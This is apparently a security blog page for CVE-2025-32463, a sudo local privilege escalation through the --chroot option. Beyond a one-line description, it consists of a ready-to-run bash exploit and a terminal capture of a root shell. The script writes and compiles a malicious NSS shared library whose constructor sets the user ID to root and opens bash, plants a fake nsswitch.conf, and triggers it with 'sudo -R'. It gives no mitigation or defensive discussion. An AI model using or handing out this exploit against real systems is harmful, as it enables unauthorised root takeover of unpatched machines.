CVE-2025-32463

Sudo before 1.9.17p1 allows local users to obtain root access because "/etc/nsswitch.conf" from a user-controlled directory is used with the --chroot option.

PoC || GTFO

N/ABASH

kdev :: ~ » ./cve-2025-32463.sh 
[*] Triggering escalation...
┌──(root㉿kdev)-[/]
└─# id
uid=0(root) gid=0(root) groups=0(root)

N/ABASH

#!/bin/bash
 
WORKDIR=$(mktemp -d /tmp/escalate.XXXXXX)
cd "${WORKDIR}" || exit 1
 
# Malicious NSS module
cat > pwn.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>
 
__attribute__((constructor)) void pwn() {
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/bash", "bash", NULL);
}
EOF
 
# Setup fake config environment
mkdir -p rootfs/etc libnss_
echo "passwd: /pwn" > rootfs/etc/nsswitch.conf
cp /etc/group rootfs/etc
 
# Build the malicious shared object
gcc -shared -fPIC -Wl,-init,pwn -o libnss_/pwn.so.2 pwn.c
 
# Execute command in restricted root to trigger NSS lookup
echo "[*] Triggering escalation..."
sudo -R rootfs pwn
 
# Cleanup
rm -rf "${WORKDIR}"

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝